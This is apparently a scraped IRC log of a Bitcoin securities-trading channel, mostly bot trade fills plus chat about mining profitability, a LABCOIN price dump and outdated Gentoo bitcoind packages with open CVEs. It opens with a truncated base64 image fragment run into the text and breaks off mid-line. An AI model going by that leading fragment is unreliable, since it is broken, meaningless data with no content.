data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAyAAAAIdCAIAAABKgY74AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAP+lSURBVHhe7P1tsB7XdR4KdnLORVBAQJND8kqKrRKjsSwWj+MyAAEDuiyn7PKHxHOua+z4GkJRRkiRoi2Q1665TpwbOkjgiAQImbLuOOUkhmXEMMQyK4OyRSmcCm2J5A/e1OWPDCu2I2viifTHqtRcq1Ql3lFCJ77BPGt/rL3W6t3v21/veXe/7F1PSd2rd+9+1t6r136wd7881b/7//z7GTNmzJgxY8aMGSOCBNYX/+RzM2Z4vPJHv2Ys5WOKnOto78Va/J1cJxdOeDOCdimKdXMm1hUzs Sep 08 18:06:25 http://decentralizedhashing.com/bitcoin-mining-equipment-table/ Sep 08 18:06:32 [BTCTC] [DMS.PURCHASE] 5 @ 0.01209 = 0.0605 BTC [-] Sep 08 18:08:12 [BTCTC] [LABCOIN] 210 @ 0.003689 = 0.7747 BTC [-] Sep 08 18:08:22 so basically no hardware will make money Sep 08 18:08:32 [BTCTC] [ASICMINER-PT] 1 @ 2.38 BTC [+] Sep 08 18:09:06 [BTCTC] [PETA-MINE] 6 @ 0.6598 = 3.9588 BTC [-] Sep 08 18:09:30 Building on the best and cheapest. Sep 08 18:09:54 my furies already made money Sep 08 18:10:12 theyve paid for themselves already? Sep 08 18:10:23 yup Sep 08 18:10:26 [BTCTC] [ACTIVEMINING] 8 @ 0.003301 = 0.0264 BTC [+] Sep 08 18:10:27 gj Sep 08 18:10:28 [BTCTC] [ACTIVEMINING] 5 @ 0.0033 = 0.0165 BTC [-] Sep 08 18:10:39 [BTCTC] [ASICMINER-PT] 1 @ 2.37 BTC [-] Sep 08 18:10:41 [BTCTC] [ASICMINER-PT] 2 @ 2.38 = 4.76 BTC [+] Sep 08 18:10:59 but i got the chips from first batch for free, made the pcbs for a few euros and thats that Sep 08 18:11:50 well then Sep 08 18:12:11 [BTCTC] [ASICMINER-PT] 1 @ 2.38 BTC [+] Sep 08 18:12:12 [BTCTC] [ASICMINER-PT] 1 @ 2.398 BTC [+] Sep 08 18:12:14 [BTCTC] [ASICMINER-PT] 1 @ 2.398 BTC [+] Sep 08 18:12:19 the linked chart, if i read it correctly, pretty much shows all hardware on that list is a loss Sep 08 18:12:45 prolly Sep 08 18:15:21 [HAVELOCK] [AM100] 10 @ 0.02045 = 0.2045 BTC [-] Sep 08 18:16:12 [BTCTC] [ACTIVEMINING] 1 @ 0.003354 BTC [+] Sep 08 18:16:18 [HAVELOCK] [AM100] 1 @ 0.0204599 BTC [+] Sep 08 18:17:21 ;;bc,stats Sep 08 18:17:23 Current Blocks: 256763 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1284 blocks | Next Difficulty In About: 1 week, 1 day, 5 hours, 32 minutes, and 18 seconds | Next Difficulty Estimate: 99203603.4725 | Estimated Percent Change: 14.11499 Sep 08 18:17:50 [BTCTC] [ASICMINER-PT] 2 @ 2.398 = 4.796 BTC [+] Sep 08 18:17:52 [BTCTC] [ASICMINER-PT] 1 @ 2.399 BTC [+] Sep 08 18:17:53 [BTCTC] [ASICMINER-PT] 1 @ 2.399 BTC [+] Sep 08 18:17:54 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] Sep 08 18:17:55 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] Sep 08 18:17:56 [BTCTC] [ASICMINER-PT] 5 @ 2.4 = 12 BTC [+] Sep 08 18:17:56 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [+] Sep 08 18:17:59 [HAVELOCK] [AM100] 38 @ 0.0204599 = 0.7775 BTC [+] Sep 08 18:18:33 [MPEX] [S.MPOE] 5650 @ 0.00089295 = 5.0452 BTC [-] Sep 08 18:21:28 [BTCTC] [PETA-MINE] 10 @ 0.6598 = 6.598 BTC [-] Sep 08 18:23:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.0234 = 0.234 BTC [-] Sep 08 18:24:36 [BTCTC] [ASICMINER-PT] 1 @ 2.428 BTC [+] Sep 08 18:24:38 [BTCTC] [ASICMINER-PT] 2 @ 2.428 = 4.856 BTC [+] Sep 08 18:25:58 [BTCTC] [ASICMINER-PT] 2 @ 2.428 = 4.856 BTC [+] Sep 08 18:26:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.02132 = 0.0426 BTC [-] Sep 08 18:27:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.02131 = 0.1066 BTC [-] Sep 08 18:27:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0213 BTC [-] Sep 08 18:28:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0213 BTC [-] Sep 08 18:28:00 [BTCTC] [TAT.ASICMINER] 31 @ 0.02131 = 0.6606 BTC [+] Sep 08 18:28:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.02132 = 0.2132 BTC [+] Sep 08 18:28:46 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [+] Sep 08 18:28:47 [BTCTC] [ASICMINER-PT] 3 @ 2.438 = 7.314 BTC [+] Sep 08 18:29:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.02299 = 0.2299 BTC [+] Sep 08 18:32:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.02299 = 0.4598 BTC [+] Sep 08 18:37:42 [BTCTC] [TAT.ASICMINER] 12 @ 0.02299 = 0.2759 BTC [+] Sep 08 18:37:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.02299 = 0.2299 BTC [+] Sep 08 18:38:30 [BTCTC] [LABCOIN] 87 @ 0.00365 = 0.3176 BTC [-] Sep 08 18:38:46 [BTCTC] [ASICMINER-PT] 2 @ 2.438 = 4.876 BTC [+] Sep 08 18:38:48 [BTCTC] [ASICMINER-PT] 2 @ 2.438 = 4.876 BTC [+] Sep 08 18:39:07 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [+] Sep 08 18:39:26 [BTCTC] [ASICMINER-PT] 10 @ 2.44 = 24.4 BTC [+] Sep 08 18:39:48 [BTCTC] [ASICMINER-PT] 20 @ 2.45 = 49 BTC [+] Sep 08 18:40:13 20%+ rally, interesting Sep 08 18:40:39 hehe Sep 08 18:40:44 [BTCTC] [LABCOIN] 1000 @ 0.003685 = 3.685 BTC [+] Sep 08 18:40:46 [BTCTC] [LABCOIN] 1500 @ 0.003686 = 5.529 BTC [+] Sep 08 18:40:47 [BTCTC] [LABCOIN] 100 @ 0.003688 = 0.3688 BTC [+] Sep 08 18:40:48 [BTCTC] [LABCOIN] 790 @ 0.003689 = 2.9143 BTC [+] Sep 08 18:40:49 [BTCTC] [LABCOIN] 2297 @ 0.003694 = 8.4851 BTC [+] Sep 08 18:40:59 buy all the things! Sep 08 18:42:03 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] Sep 08 18:42:12 only the good stuff Sep 08 18:42:18 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [-] Sep 08 18:42:28 i managed to get some xbond :P Sep 08 18:42:53 [BTCTC] [LABCOIN] 1 @ 0.0037 BTC [+] Sep 08 18:42:54 [BTCTC] [LABCOIN] 3844 @ 0.0037 = 14.2228 BTC [+] Sep 08 18:44:18 [HAVELOCK] [AM100] 1 @ 0.02002 BTC [-] Sep 08 18:44:37 [HAVELOCK] [AM100] 1 @ 0.01956 BTC [-] Sep 08 18:44:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0232 BTC [+] Sep 08 18:44:52 [BTCTC] [LABCOIN] 271 @ 0.0037 = 1.0027 BTC [+] Sep 08 18:44:58 [HAVELOCK] [AM100] 1 @ 0.0203 BTC [+] Sep 08 18:45:14 [HAVELOCK] [AM100] 9 @ 0.0203 = 0.1827 BTC [+] Sep 08 18:45:18 [HAVELOCK] [AM100] 1 @ 0.01952 BTC [-] Sep 08 18:45:44 [HAVELOCK] [AM100] 9 @ 0.01952 = 0.1757 BTC [-] Sep 08 18:46:20 [BTCTC] [LABCOIN] 20 @ 0.00361 = 0.0722 BTC [-] Sep 08 18:46:23 [BTCTC] [LABCOIN] 5 @ 0.003609 = 0.018 BTC [-] Sep 08 18:46:29 [BTCTC] [LABCOIN] 14 @ 0.003603 = 0.0504 BTC [-] Sep 08 18:46:30 [BTCTC] [LABCOIN] 41 @ 0.003601 = 0.1476 BTC [-] Sep 08 18:46:31 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [-] Sep 08 18:46:32 [BTCTC] [LABCOIN] 300 @ 0.0036 = 1.08 BTC [-] Sep 08 18:46:33 [BTCTC] [LABCOIN] 572 @ 0.00355 = 2.0306 BTC [-] Sep 08 18:46:34 [BTCTC] [LABCOIN] 143 @ 0.003545 = 0.5069 BTC [-] Sep 08 18:46:35 [BTCTC] [LABCOIN] 218 @ 0.003521 = 0.7676 BTC [-] Sep 08 18:46:36 [BTCTC] [LABCOIN] 96 @ 0.00352 = 0.3379 BTC [-] Sep 08 18:46:38 [BTCTC] [LABCOIN] 777 @ 0.00352 = 2.735 BTC [-] Sep 08 18:46:39 [BTCTC] [LABCOIN] 250 @ 0.003506 = 0.8765 BTC [-] Sep 08 18:46:40 [BTCTC] [LABCOIN] 1000 @ 0.003505 = 3.505 BTC [-] Sep 08 18:46:41 [BTCTC] [LABCOIN] 12 @ 0.003503 = 0.042 BTC [-] Sep 08 18:46:42 [BTCTC] [LABCOIN] 50 @ 0.003502 = 0.1751 BTC [-] Sep 08 18:46:42 [BTCTC] [LABCOIN] 24 @ 0.003493 = 0.0838 BTC [-] Sep 08 18:46:43 [BTCTC] [LABCOIN] 98 @ 0.003492 = 0.3422 BTC [-] Sep 08 18:46:44 [BTCTC] [LABCOIN] 24 @ 0.003465 = 0.0832 BTC [-] Sep 08 18:46:45 [BTCTC] [LABCOIN] 98 @ 0.003464 = 0.3395 BTC [-] Sep 08 18:46:46 [BTCTC] [LABCOIN] 870 @ 0.003441 = 2.9937 BTC [-] Sep 08 18:46:47 [BTCTC] [LABCOIN] 24 @ 0.003437 = 0.0825 BTC [-] Sep 08 18:46:48 [BTCTC] [LABCOIN] 96 @ 0.003436 = 0.3299 BTC [-] Sep 08 18:46:49 [BTCTC] [LABCOIN] 12 @ 0.003421 = 0.0411 BTC [-] Sep 08 18:46:51 [BTCTC] [LABCOIN] 50 @ 0.00342 = 0.171 BTC [-] Sep 08 18:46:52 [BTCTC] [LABCOIN] 273 @ 0.003414 = 0.932 BTC [-] Sep 08 18:46:52 [BTCTC] [LABCOIN] 1093 @ 0.003413 = 3.7304 BTC [-] Sep 08 18:46:53 [BTCTC] [LABCOIN] 224 @ 0.003411 = 0.7641 BTC [-] Sep 08 18:46:54 [BTCTC] [LABCOIN] 800 @ 0.00341 = 2.728 BTC [-] Sep 08 18:46:55 [BTCTC] [LABCOIN] 97 @ 0.003409 = 0.3307 BTC [-] Sep 08 18:46:56 [BTCTC] [LABCOIN] 246 @ 0.003402 = 0.8369 BTC [-] Sep 08 18:46:57 [BTCTC] [LABCOIN] 485 @ 0.003401 = 1.6495 BTC [-] Sep 08 18:46:57 lol Sep 08 18:46:58 [BTCTC] [LABCOIN] 500 @ 0.0034 = 1.7 BTC [-] Sep 08 18:46:59 [BTCTC] [LABCOIN] 78 @ 0.003391 = 0.2645 BTC [-] Sep 08 18:47:00 [BTCTC] [LABCOIN] 313 @ 0.00339 = 1.0611 BTC [-] Sep 08 18:47:01 [BTCTC] [LABCOIN] 24 @ 0.003383 = 0.0812 BTC [-] Sep 08 18:47:02 [BTCTC] [LABCOIN] 73 @ 0.003382 = 0.2469 BTC [-] Sep 08 18:47:03 timberrrrrrrrr Sep 08 18:47:09 aww Sep 08 18:47:16 :/ Sep 08 18:48:32 Labcoiner "LOL at the poorly timed dump. Yeah, people are buying. Whatever you do, don't set an ask. Dump for lower prices! You clowns." Sep 08 18:49:41 [BTCTC] [LABCOIN] 242 @ 0.00369 = 0.893 BTC [+] Sep 08 18:49:42 [BTCTC] [LABCOIN] 31 @ 0.003692 = 0.1145 BTC [+] Sep 08 18:49:43 [BTCTC] [LABCOIN] 1000 @ 0.003693 = 3.693 BTC [+] Sep 08 18:49:44 [BTCTC] [LABCOIN] 1348 @ 0.003694 = 4.9795 BTC [+] Sep 08 18:49:45 [BTCTC] [LABCOIN] 534 @ 0.003696 = 1.9737 BTC [+] Sep 08 18:49:46 [BTCTC] [LABCOIN] 5 @ 0.003699 = 0.0185 BTC [+] Sep 08 18:49:47 [BTCTC] [LABCOIN] 1888 @ 0.003699 = 6.9837 BTC [+] Sep 08 18:49:48 [BTCTC] [LABCOIN] 4952 @ 0.0037 = 18.3224 BTC [+] Sep 08 18:50:03 jesus man Sep 08 18:50:11 real retarded stuff Sep 08 18:52:06 [BTCTC] [PETA-MINE] 2 @ 0.6598 = 1.3196 BTC [-] Sep 08 18:52:15 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 08 18:52:16 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 08 18:52:57 [BTCTC] [ACTIVEMINING] 10 @ 0.003405 = 0.0341 BTC [+] Sep 08 18:52:57 [BTCTC] [ACTIVEMINING] 10 @ 0.003406 = 0.0341 BTC [+] Sep 08 18:52:58 [BTCTC] [ACTIVEMINING] 459 @ 0.003469 = 1.5923 BTC [+] Sep 08 18:53:00 [BTCTC] [ACTIVEMINING] 459 @ 0.003472 = 1.5936 BTC [+] Sep 08 18:53:43 [BTCTC] [ACTIVEMINING] 400 @ 0.003496 = 1.3984 BTC [+] Sep 08 18:53:50 [HAVELOCK] [AM100] 10 @ 0.01955 = 0.1955 BTC [+] Sep 08 18:54:15 [BTCTC] [ASICMINER-PT] 2 @ 2.481 = 4.962 BTC [+] Sep 08 18:54:16 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Sep 08 18:54:17 [BTCTC] [ASICMINER-PT] 2 @ 2.498 = 4.996 BTC [+] Sep 08 18:54:18 [BTCTC] [ASICMINER-PT] 2 @ 2.498 = 4.996 BTC [+] Sep 08 18:55:05 [BTCTC] [TAT.ASICMINER] 50 @ 0.0234 = 1.17 BTC [+] Sep 08 18:56:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.0234 = 2.34 BTC [+] Sep 08 18:58:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.0234 = 0.0702 BTC [+] Sep 08 19:03:00 [BTCTC] [PETA-MINE] 14 @ 0.6598 = 9.2372 BTC [-] Sep 08 19:03:12 [HAVELOCK] [AM100] 10 @ 0.01995 = 0.1995 BTC [+] Sep 08 19:03:19 [BTCTC] [PAJKA.BOND] 1 @ 0.012 BTC [+] Sep 08 19:06:41 [BTCTC] [LABCOIN] 471 @ 0.003497 = 1.6471 BTC [-] Sep 08 19:06:43 [BTCTC] [LABCOIN] 117 @ 0.003495 = 0.4089 BTC [-] Sep 08 19:06:44 [BTCTC] [LABCOIN] 1 @ 0.003489 BTC [-] Sep 08 19:06:45 [BTCTC] [LABCOIN] 5 @ 0.003488 = 0.0174 BTC [-] Sep 08 19:06:47 [BTCTC] [LABCOIN] 25 @ 0.003476 = 0.0869 BTC [-] Sep 08 19:06:48 [BTCTC] [LABCOIN] 100 @ 0.003475 = 0.3475 BTC [-] Sep 08 19:06:49 [BTCTC] [LABCOIN] 281 @ 0.003471 = 0.9754 BTC [-] Sep 08 19:08:05 [HAVELOCK] [DEALCO] 3 @ 0.0115 = 0.0345 BTC [-] Sep 08 19:08:35 some 6 months ago or so i remember seeing some mathematician discussing various automated trading strategies with a strong bias on the math. anyone remember this and know where it is? Sep 08 19:11:29 [BTCTC] [ACTIVEMINING] 10 @ 0.003472 = 0.0347 BTC [-] Sep 08 19:11:32 [BTCTC] [ACTIVEMINING] 10 @ 0.003473 = 0.0347 BTC [+] Sep 08 19:11:47 [BTCTC] [DMS.PURCHASE] 1 @ 0.01208 BTC [-] Sep 08 19:12:47 [BTCTC] [NASTY-PT] 1 @ 0.002 BTC [+] Sep 08 19:13:34 [BTCTC] [DMS.MINING] 11 @ 0.002899 = 0.0319 BTC [+] Sep 08 19:14:07 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000642 = 0.0013 BTC [+] Sep 08 19:16:43 [BTCTC] [LABCOIN] 1 @ 0.003661 BTC [+] Sep 08 19:17:02 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.000642 = 0.0116 BTC [+] Sep 08 19:18:43 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [+] Sep 08 19:20:17 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006 = 0.0012 BTC [-] Sep 08 19:20:18 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.00052 = 0.0416 BTC [-] Sep 08 19:20:20 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.0005141 = 0.0108 BTC [-] Sep 08 19:20:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000514 BTC [-] Sep 08 19:20:22 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.0005022 = 0.0126 BTC [-] Sep 08 19:20:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.0234 = 0.1638 BTC [+] Sep 08 19:20:46 [BTCTC] [TAT.ASICMINER] 43 @ 0.0234 = 1.0062 BTC [+] Sep 08 19:21:31 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.0004011 = 0.0084 BTC [-] Sep 08 19:21:33 [BTCTC] [TAT.VIRTUALMINE] 262 @ 0.0004001 = 0.1048 BTC [-] Sep 08 19:22:42 [HAVELOCK] [AM100] 10 @ 0.01995 = 0.1995 BTC [+] Sep 08 19:24:23 [BTCTC] [DMS.PURCHASE] 74 @ 0.01208 = 0.8939 BTC [-] Sep 08 19:25:40 [BTCTC] [BTC-TRADING-PT] 10 @ 1 = 10 BTC [-] Sep 08 19:25:42 [HAVELOCK] [AM1] 1 @ 2.19 BTC [+] Sep 08 19:25:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02137 BTC [-] Sep 08 19:25:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.02136 = 0.1922 BTC [-] Sep 08 19:32:03 [HAVELOCK] [AM100] 10 @ 0.0202 = 0.202 BTC [+] Sep 08 19:32:42 [HAVELOCK] [AM100] 10 @ 0.0201 = 0.201 BTC [-] Sep 08 19:32:57 [HAVELOCK] [AM100] 6 @ 0.0201 = 0.1206 BTC [-] Sep 08 19:33:12 [HAVELOCK] [AM100] 10 @ 0.0201 = 0.201 BTC [-] Sep 08 19:33:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02339 BTC [+] Sep 08 19:33:25 [BTCTC] [TAT.ASICMINER] 7 @ 0.0234 = 0.1638 BTC [+] Sep 08 19:33:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0234 = 0.0468 BTC [+] Sep 08 19:33:39 [HAVELOCK] [AM100] 5 @ 0.0201 = 0.1005 BTC [-] Sep 08 19:34:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00064 BTC [+] Sep 08 19:34:25 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00064 = 0.0013 BTC [+] Sep 08 19:34:38 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [+] Sep 08 19:35:13 ThickAsThieves: watch CB.IDIFF-E closely, another shorter coming Sep 08 19:36:46 [BTCTC] [LABCOIN] 48 @ 0.003637 = 0.1746 BTC [-] Sep 08 19:36:47 [BTCTC] [LABCOIN] 20 @ 0.003638 = 0.0728 BTC [+] Sep 08 19:36:48 [BTCTC] [LABCOIN] 4 @ 0.003638 = 0.0146 BTC [+] Sep 08 19:36:50 [BTCTC] [LABCOIN] 274 @ 0.003652 = 1.0006 BTC [+] Sep 08 19:36:50 [BTCTC] [LABCOIN] 376 @ 0.003654 = 1.3739 BTC [+] Sep 08 19:36:51 [BTCTC] [LABCOIN] 300 @ 0.003669 = 1.1007 BTC [+] Sep 08 19:36:52 [BTCTC] [LABCOIN] 500 @ 0.00369 = 1.845 BTC [+] Sep 08 19:38:32 [HAVELOCK] [AM100] 10 @ 0.02058 = 0.2058 BTC [+] Sep 08 19:39:29 [HAVELOCK] [AM100] 18 @ 0.02028 = 0.365 BTC [-] Sep 08 19:39:33 [HAVELOCK] [AM100] 7 @ 0.02059 = 0.1441 BTC [+] Sep 08 19:40:53 [BTCTC] [DMS.MINING] 1 @ 0.00289 BTC [-] Sep 08 19:41:15 [BTCTC] [BASIC-MINING] 9 @ 0.12 = 1.08 BTC [+] Sep 08 19:45:11 [BTCTC] [DMS.MINING] 1 @ 0.00289 BTC [-] Sep 08 19:47:10 [BTCTC] [CB.IDIFF-O] 1 @ 0.009501 BTC [-] Sep 08 19:47:55 [BTCTC] [DMS.SELLING] 100 @ 0.009507 = 0.9507 BTC [+] Sep 08 19:50:25 [BTCTC] [ACTIVEMINING] 100 @ 0.0034 = 0.34 BTC [-] Sep 08 19:53:46 [BTCTC] [ACTIVEMINING] 80 @ 0.00335 = 0.268 BTC [-] Sep 08 19:55:34 [BTCTC] [DMS.MINING] 76 @ 0.00289 = 0.2196 BTC [-] Sep 08 19:56:19 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Sep 08 19:56:32 [BTCTC] [ASICMINER-PT] 3 @ 2.401 = 7.203 BTC [-] Sep 08 19:56:35 [BTCTC] [ASICMINER-PT] 3 @ 2.4 = 7.2 BTC [-] Sep 08 19:56:36 [BTCTC] [ASICMINER-PT] 10 @ 2.4 = 24 BTC [-] Sep 08 19:56:38 [BTCTC] [ASICMINER-PT] 8 @ 2.4 = 19.2 BTC [-] Sep 08 19:57:40 [BTCTC] [DMS.MINING] 100 @ 0.00279 = 0.279 BTC [-] Sep 08 19:57:43 [BTCTC] [ACTIVEMINING] 80 @ 0.003399 = 0.2719 BTC [+] Sep 08 19:57:44 [BTCTC] [ACTIVEMINING] 349 @ 0.003462 = 1.2082 BTC [+] Sep 08 19:57:46 [BTCTC] [ACTIVEMINING] 349 @ 0.003466 = 1.2096 BTC [+] Sep 08 19:57:47 [BTCTC] [ACTIVEMINING] 112 @ 0.003499 = 0.3919 BTC [+] Sep 08 19:57:48 [BTCTC] [ACTIVEMINING] 112 @ 0.0035 = 0.392 BTC [+] Sep 08 19:58:36 [BTCTC] [DMS.PURCHASE] 100 @ 0.01208 = 1.208 BTC [-] Sep 08 19:58:57 [BTCTC] [ACTIVEMINING] 200 @ 0.003504 = 0.7008 BTC [+] Sep 08 19:59:07 [BTCTC] [ACTIVEMINING] 200 @ 0.003504 = 0.7008 BTC [+] Sep 08 19:59:19 [BTCTC] [ACTIVEMINING] 123 @ 0.003504 = 0.431 BTC [+] Sep 08 19:59:31 [BTCTC] [ACTIVEMINING] 200 @ 0.003505 = 0.701 BTC [+] Sep 08 19:59:44 [BTCTC] [ACTIVEMINING] 200 @ 0.003507 = 0.7014 BTC [+] Sep 08 19:59:55 [BTCTC] [ACTIVEMINING] 123 @ 0.003507 = 0.4314 BTC [+] Sep 08 20:00:18 [BTCTC] [ACTIVEMINING] 82 @ 0.003506 = 0.2875 BTC [-] Sep 08 20:00:19 [BTCTC] [ACTIVEMINING] 18 @ 0.00351 = 0.0632 BTC [+] Sep 08 20:00:32 [BTCTC] [ACTIVEMINING] 48 @ 0.00351 = 0.1685 BTC [+] Sep 08 20:00:56 [BTCTC] [ACTIVEMINING] 100 @ 0.003511 = 0.3511 BTC [+] Sep 08 20:01:24 [BTCTC] [ACTIVEMINING] 60 @ 0.003609 = 0.2165 BTC [+] Sep 08 20:01:37 [BTCTC] [ACTIVEMINING] 30 @ 0.00361 = 0.1083 BTC [+] Sep 08 20:02:39 [BTCTC] [LABCOIN] 235 @ 0.003685 = 0.866 BTC [-] Sep 08 20:02:40 [BTCTC] [LABCOIN] 51 @ 0.003687 = 0.188 BTC [+] Sep 08 20:02:42 [BTCTC] [LABCOIN] 1580 @ 0.00369 = 5.8302 BTC [+] Sep 08 20:02:43 [BTCTC] [LABCOIN] 1777 @ 0.003693 = 6.5625 BTC [+] Sep 08 20:03:09 [BTCTC] [LABCOIN] 200 @ 0.003683 = 0.7366 BTC [-] Sep 08 20:03:11 [HAVELOCK] [AM100] 3 @ 0.02028 = 0.0608 BTC [-] Sep 08 20:03:24 [BTCTC] [LABCOIN] 35 @ 0.003683 = 0.1289 BTC [-] Sep 08 20:03:32 [BTCTC] [LABCOIN] 140 @ 0.003683 = 0.5156 BTC [-] Sep 08 20:06:09 [HAVELOCK] [HIM] 5 @ 0.139 = 0.695 BTC [+] Sep 08 20:06:12 [HAVELOCK] [HIM] 5 @ 0.138 = 0.69 BTC [-] Sep 08 20:09:28 [HAVELOCK] [AM100] 3 @ 0.02058 = 0.0617 BTC [+] Sep 08 20:14:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02139 BTC [-] Sep 08 20:15:31 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Sep 08 20:15:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.02138 = 0.0855 BTC [-] Sep 08 20:18:18 [BTCTC] [PETA-MINE] 2 @ 0.6598 = 1.3196 BTC [-] Sep 08 20:19:03 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [-] Sep 08 20:19:19 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [+] Sep 08 20:19:20 [BTCTC] [ASICMINER-PT] 2 @ 2.469 = 4.938 BTC [+] Sep 08 20:19:26 [HAVELOCK] [AM100] 10 @ 0.02029 = 0.2029 BTC [-] Sep 08 20:19:41 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [-] Sep 08 20:20:20 [BTCTC] [ACTIVEMINING] 2 @ 0.003517 = 0.007 BTC [-] Sep 08 20:20:21 [BTCTC] [ACTIVEMINING] 10 @ 0.003516 = 0.0352 BTC [-] Sep 08 20:20:23 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [-] Sep 08 20:20:36 [BTCTC] [ACTIVEMINING] 88 @ 0.003516 = 0.3094 BTC [-] Sep 08 20:21:07 [BTCTC] [ACTIVEMINING] 22 @ 0.003509 = 0.0772 BTC [-] Sep 08 20:21:20 [BTCTC] [ACTIVEMINING] 66 @ 0.003509 = 0.2316 BTC [-] Sep 08 20:21:48 [BTCTC] [ACTIVEMINING] 22 @ 0.003505 = 0.0771 BTC [-] Sep 08 20:21:50 [BTCTC] [ACTIVEMINING] 44 @ 0.003504 = 0.1542 BTC [-] Sep 08 20:22:00 [BTCTC] [PETA-MINE] 2 @ 0.6598 = 1.3196 BTC [-] Sep 08 20:22:36 [BTCTC] [BASIC-MINING] 1 @ 0.12 BTC [+] Sep 08 20:28:23 https://bugs.gentoo.org/show_bug.cgi?id=484134 add this to your distro... for luke-jr's greater enjoyment Sep 08 20:28:26 Bug 484134 – [BTCTC] [LABCOIN] 235 @ 0.003698 = 0.869 BTC [+] Sep 08 20:30:15 [BTCTC] [LABCOIN] 15 @ 0.003698 = 0.0555 BTC [+] Sep 08 20:30:44 ? Sep 08 20:32:14 stable gentoo is still at 0.8.1 and luke's the maintainer Sep 08 20:32:41 I thought he was only maintainer of an overlay Sep 08 20:33:10 [BTCTC] [DMS.PURCHASE] 8 @ 0.01208 = 0.0966 BTC [-] Sep 08 20:34:43 hmm no you're right, metadata.xml confirms him as a maintainer (or is it proxy maintainer?) Sep 08 20:36:22 https://bugs.gentoo.org/show_bug.cgi?id=462046 still open too Sep 08 20:36:26 Bug 462046 – net-p2p/bitcoind, net-p2p/bitcoin-qt: multiple vulnerabilities (CVE-2013-{2272,2273,2 Sep 08 20:36:26 Gentoo is terrible at dealing with security issues now… Sep 08 20:37:46 [BTCTC] [LABCOIN] 5 @ 0.003651 = 0.0183 BTC [-] Sep 08 20:37:47 [BTCTC] [LABCOIN] 1000 @ 0.00365 = 3.65 BTC [-] Sep 08 20:40:05 lol gentoo has bitcoin bugs Sep 08 20:40:19 lol Luke-Jr maintains gentoo? Sep 08 20:40:30 pankkake: wow, completely overlooked this one Sep 08 20:40:45 no, luke does bitcoin ebuilds Sep 08 20:40:54 down with luke-jr! Sep 08 20:41:27 other distros upgraded alrewady? Sep 08 20:42:09 i thought everyone who was anyone just used debian Sep 08 20:44:46 !ticker m s.mpoe Sep 08 20:44:47 [MPEX:S.MPOE] 1D: 0.0008842 / 0.00088747 / 0.00089415 (96244 shares, 85.41 BTC), 7D: 0.00081 / 0.00087341 / 0.00090058 (1792457 shares, 1,565.56 BTC), 30D: 0.00081 / 0.00085463 / 0.00090058 (8103500 shares, 6,925.50 BTC) Sep 08 20:44:49 !ticker m ^OIX Sep 08 20:44:51 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 195.15803475 / 195.15803475 (4 shares, 1.65 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Sep 08 20:45:06 needs to do price fixing Sep 08 20:45:49 [HAVELOCK] [XBOND] 62 @ 0.001135 = 0.0704 BTC [-] Sep 08 20:45:53 or painting lol Sep 08 20:46:05 [HAVELOCK] [AM1] 1 @ 2.1999 BTC [+] Sep 08 20:46:29 [HAVELOCK] [AM100] 10 @ 0.02058 = 0.2058 BTC [+] Sep 08 20:46:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02294 BTC [+] Sep 08 20:46:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.02295 = 0.2295 BTC [+] Sep 08 20:46:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.02299 = 0.046 BTC [+] Sep 08 20:46:44 [BTCTC] [TAT.ASICMINER] 75 @ 0.02299 = 1.7243 BTC [+] Sep 08 20:46:45 [BTCTC] [TAT.ASICMINER] 1 @ 